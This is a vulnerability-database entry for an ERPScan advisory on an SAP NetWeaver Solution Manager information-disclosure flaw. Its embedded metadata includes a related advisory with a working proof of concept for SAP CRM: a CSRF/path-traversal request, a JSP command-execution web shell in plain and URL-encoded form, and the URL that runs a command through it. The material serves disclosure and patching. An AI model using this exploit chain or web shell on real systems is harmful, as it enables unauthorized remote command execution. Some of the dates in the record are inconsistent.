SAP NetWeaver Solution Manager - Missing Authorization Check & Information Disclosure
2011-07-12T00:00:00
ID ERPSCAN-14-004 Type erpscan Reporter ERPScan Modified 2011-07-12T00:00:00
Description
Application: SAP NetWeaver Solution Manager Versions Affected: SAP NetWeaver Solution Manager Vendor URL:http://www.sap.com Bugs: Missing Authorization Check & Information Disclosure Reported: 07.12.2011 Vendor response: 08.12.2011 Date of Public Advisory: 25.01.2014 Reference: SAP Security Note 1828885 CVSS: AV:N/AC:L/AU:N/C:P/I:N/A:N 5.0 Author: Evgeny Neyolov (ERPScan)
Description
SAP NetWeaver Solution Manager is vulnerable to information disclosure through missing authorization check.
Business Risk
An attacker can use an information disclosure vulnerability for revealing additional information (system data, debugging information, etc.) which will help to learn more about the system and to plan other attacks.
Defense
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:
{"type": "erpscan", "published": "2011-07-12T00:00:00", "href": "https://erpscan.io/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"dependencies": {"references": [{"type": "erpscan", "idList": ["ERPSCAN-18-004"]}, {"type": "cve", "idList": ["CVE-2014-1960"]}], "modified": "2020-09-15T10:41:39", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2020-09-15T10:41:39", "rev": 2}, "vulnersScore": 5.7}, "lastseen": "2020-09-15T10:41:39", "viewCount": 2, "id": "ERPSCAN-14-004", "references": [], "edition": 4, "reporter": "ERPScan", "modified": "2011-07-12T00:00:00", "title": "SAP NetWeaver Solution Manager - Missing Authorization Check & Information Disclosure", "description": "**Application:** SAP NetWeaver Solution Manager \n**Versions Affected:** SAP NetWeaver Solution Manager \n**Vendor URL:** [http://www.sap.com ](<http://www.sap.com>) \n**Bugs:** Missing Authorization Check & Information Disclosure \n**Reported:** 07.12.2011 \n**Vendor response:** 08.12.2011 \n**Date of Public Advisory:** 25.01.2014 \n**Reference:** SAP Security Note [1828885](<https://service.sap.com/sap/support/notes/1828885>) \n**CVSS:** AV:N/AC:L/AU:N/C:P/I:N/A:N 5.0 \n**Author:** Evgeny Neyolov (ERPScan)\n\n**Description** \nSAP NetWeaver Solution Manager is vulnerable to information disclosure through missing authorization check.\n\n**Business Risk** \nAn attacker can use an information disclosure vulnerability for revealing additional information (system data, debugging information, etc.) which will help to learn more about the system and to plan other attacks.\n\n**Defense**\n\nTo prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:\n\n * [SAP Vulnerability Assessment](<http://erpscan.com/services-2/sap-vulnerability-assessment/>)\n * [SAP Security Assessment](<http://erpscan.com/services-2/sap-security-assessment/>)\n * [SAP Security Trainings](<http://erpscan.com/services-2/sap-security-trainings/>)\n * [SAP Custom code security review](<http://erpscan.com/services-2/sap-custom-code-security-review/>)\n * [SAP Penetration testing](<http://erpscan.com/services-2/sap-penetration-testing/>)\n", "scheme": null}
{"erpscan": [{"lastseen": "2020-09-15T10:41:37", "bulletinFamily": "info", "cvelist": [], "edition": 2, "description": "**Application:** SAP NetWeaver \n**Versions Affected:** SAP CRM 13676083 \n**Vendor URL:** [ SAP](<http://sap.com>) \n**Bugs:** CSRF, Path Traversal \n**Reported:** 05.10.2017 \n**Vendor response:** 06.10.2017 \n**Date of Public Advisory:** 13.02.2018 \n**Reference:** SAP Security Note [2547431](<https://service.sap.com/sap/support/notes/2547431>) \n**Author:** Vahagn Vardanyan (ERPScan), Vladimir Egorov (ERPScan)\n\n## VULNERABILITY INFORMATION\n\nClass: Directory Traversal \nRisk: Medium \nImpact: Attacker could read content of arbitrary files on the remote server and expose sensitive data confidentiality \nRemotely Exploitable: Yes \nLocally Exploitable: Yes\n\n### CVSS Information\n\nCVSS v3 Base Score: 6.6 / 10 \nCVSS Base v3 Base Vector:\n\nAV: Attack Vector (Related exploit range) | Network (N) \n---|--- \nAC: Attack Complexity (Required attack complexity) | Low (L) \nPR: Privileges Required (Level of privileges needed to exploit) | High (H) \nUI: User Interaction (Required user participation) | None (N) \nS: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed (C) \nC: Impact to Confidentiality | Low (L) \nI: Impact to Integrity | Low (L) \nA: Impact to Availability| Low (L) \n \n## DESCRIPTION\n\nAn attacker can change the path and extension of the log file in SAP CRM using path Traversal and CSRF vulnerability, write the special Java code in this log file, and execute any command via HTTP request. \n\n## BUSINESS RISK\n\nAn attacker can use a Cross-Site Request Forgery vulnerability for exploiting an authenticated user\u2019s session by making a request containing a certain URL and specific parameters. A function will be executed with an authenticated user\u2019s rights. An attacker may use a Cross-Site Scripting vulnerability to achieve this or can present a specially crafted link to an attacked user.\n\n## VULNERABLE PACKAGES\n\nCRM JAVA APPLICATIONS 7.01 SP009 \nCRM JAVA APPLICATIONS 7.02 SP004 \nCRM JAVA APPLICATIONS 7.30 SP012 \nCRM JAVA APPLICATIONS 7.31 SP009 \nCRM JAVA APPLICATIONS 7.32 SP004 \nCRM JAVA APPLICATIONS 7.33 SP000 \nCRM JAVA APPLICATIONS 7.54 SP001 \nCRM JAVA COMPONENTS 7.01 SP009 \nCRM JAVA COMPONENTS 7.02 SP004 \nCRM JAVA COMPONENTS 7.30 SP012 \nCRM JAVA COMPONENTS 7.31 SP009 \nCRM JAVA COMPONENTS 7.32 SP004 \nCRM JAVA COMPONENTS 7.33 SP000 \nCRM JAVA COMPONENTS 7.54 SP001 \nCRM JAVA WEB COMPONENTS 7.01 SP009 \nCRM JAVA WEB COMPONENTS 7.02 SP004 \nCRM JAVA WEB COMPONENTS 7.30 SP012 \nCRM JAVA WEB COMPONENTS 7.31 SP009 \nCRM JAVA WEB COMPONENTS 7.32 SP004 \nCRM JAVA WEB COMPONENTS 7.33 SP000\n\n## SOLUTIONS AND WORKAROUNDS\n\nTo correct this vulnerability, install SAP Security Note [2547431](<https://service.sap.com/sap/support/notes/2547431>)\n\n## TECHNICAL DESCRIPTION\n\n### Proof of Concept\n\n**Path Traversal**\n\nUsing this path traversal an attacker can change CRM log path.\n\n[](<https://erpscan.com/wp-content/uploads/2018/02/18-004.png>)\n\nPOST /b2b/admin/logging.jsp HTTP/1.1 Host: 172.16.10.65:50001 Connection: close Content-Length: 302 Cache-Control: max-age=0 Origin: https://172.16.10.65:50001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.71 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: https://172.16.10.65:50001/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1 Accept-Encoding: gzip, deflate, br Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: xsrfid=1&selConfigName=com.sap.isa&selSeverity=0&selDest=C:\\usr\\sap\\DM0\\J00\\j2ee\\cluster\\apps\\sap.com\\com.sap.engine.docs.examples\\servlet_jsp\\\\_default\\root\\shell.jsp&selLimit=10485760&selCount=20&selFormatterType=ListFormat&selPattern=none&mode=save&selLocationIdx=1\n\n1\n\n2\n\n3\n\n4\n\n5\n\n6\n\n7\n\n8\n\n9\n\n10\n\n11\n\n12\n\n13\n\n14\n\n15\n\n16\n\n| \n\nPOST /b2b/admin/logging.jsp HTTP/1.1\n\nHost: 172.16.10.65:50001\n\nConnection: close\n\nContent-Length: 302\n\nCache-Control: max-age=0\n\nOrigin: https://172.16.10.65:50001\n\nUpgrade-Insecure-Requests: 1\n\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.71\n\nContent-Type: application/x-www-form-urlencoded\n\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\n\nReferer: https://172.16.10.65:50001/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1\n\nAccept-Encoding: gzip, deflate, br\n\nAccept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4\n\nCookie:\n\nxsrfid=1&selConfigName=com.sap.isa&selSeverity=0&selDest=C:\\usr\\sap\\DM0\\J00\\j2ee\\cluster\\apps\\sap.com\\com.sap.engine.docs.examples\\servlet_jsp\\_default\\root\\shell.jsp&selLimit=10485760&selCount=20&selFormatterType=ListFormat&selPattern=none&mode=save&selLocationIdx=1 \n \n---|--- \n \nThere is an authorization mechanism here, but there is no CSRF token (in configuration panel we enabled CSRF protection).\n\n[](<https://erpscan.com/wp-content/uploads/2018/02/18-004-2.png>)\n\n**Uploading RCE**\n\nAfter creating an evil log file, an attacker can send this request with jsp shell to server, and server writes `C:\\usr\\sap\\DM0\\J00\\j2ee\\cluster\\apps\\sap.com\\com.sap.engine.docs.examples\\servlet_jsp\\_default\\root\\shell.jsp` file this jsp code\n\n<%@ page import=\"java.util.*,java.io.*\"%><% if (request.getParameter(\"cmd\") != null){Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); out.println(\"<PRE>\"); while ( disr != null ) {out.println(disr);disr =dis.readLine();}out.println(\"</PRE>\");} %>\n\n1\n\n| \n\n<%@ page import=\"java.util.*,java.io.*\"%><% if (request.getParameter(\"cmd\") != null){Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); out.println(\"<PRE>\"); while ( disr != null ) {out.println(disr);disr =dis.readLine();}out.println(\"</PRE>\");} %> \n \n---|--- \n \n[](<https://erpscan.com/wp-content/uploads/2018/02/18-004-3.png>)\n\nhttps://172.16.10.65:50001/b2b/init.do?\"]%3c%25%40+page+import%3d\"java.util.*,java.io.*\"%25>%3c%25+if+(request.getParameter(\"cmd\")+!%3d+null){Process+p+%3d+Runtime.getRuntime().exec(request.getParameter(\"cmd\"))%3bOutputStream+os+%3d+p.getOutputStream()%3b+InputStream+in+%3d+p.getInputStream()%3b+DataInputStream+dis+%3d+new+DataInputStream(in)%3b+String+disr+%3d+dis.readLine()%3b+out.println(\"<PRE>\")%3b+while+(+disr+!%3d+null+)+{out.println(disr)%3bdisr+%3ddis.readLine()%3b}out.println(\"</PRE>\")%3b}+%25>[\"#\n\n1\n\n| \n\nhttps://172.16.10.65:50001/b2b/init.do?\"]%3c%25%40+page+import%3d\"java.util.*,java.io.*\"%25>%3c%25+if+(request.getParameter(\"cmd\")+!%3d+null){Process+p+%3d+Runtime.getRuntime().exec(request.getParameter(\"cmd\"))%3bOutputStream+os+%3d+p.getOutputStream()%3b+InputStream+in+%3d+p.getInputStream()%3b+DataInputStream+dis+%3d+new+DataInputStream(in)%3b+String+disr+%3d+dis.readLine()%3b+out.println(\"<PRE>\")%3b+while+(+disr+!%3d+null+)+{out.println(disr)%3bdisr+%3ddis.readLine()%3b}out.println(\"</PRE>\")%3b}+%25>[\"# \n \n---|--- \n \n**Executing RCE**\n\nhttps://172.16.10.65:50001/shell.0.jsp?cmd=ipconfig\n\n1\n\n| \n\nhttps://172.16.10.65:50001/shell.0.jsp?cmd=ipconfig \n \n---|--- \n \n[](<https://erpscan.com/wp-content/uploads/2018/02/18-004-4.png>)\n", "modified": "2017-05-10T00:00:00", "published": "2017-05-10T00:00:00", "href": "https://erpscan.io/advisories/erpscan-18-004-rce-via-path-traversal-using-csrf-sap-crm/", "id": "ERPSCAN-18-004", "type": "erpscan", "title": "RCE via path Traversal using CSRF in SAP CRM", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors.", "edition": 3, "cvss3": {}, "published": "2014-02-14T15:55:00", "title": "CVE-2014-1960", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1960"], "modified": "2018-12-10T19:29:00", "cpe": ["cpe:/a:sap:netweaver_solution_manager:7.0", "cpe:/a:sap:netweaver_solution_manager:7.1", "cpe:/a:sap:netweaver:-"], "id": "CVE-2014-1960", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1960", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sap:netweaver_solution_manager:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_solution_manager:7.0:*:*:*:*:*:*:*"]}]}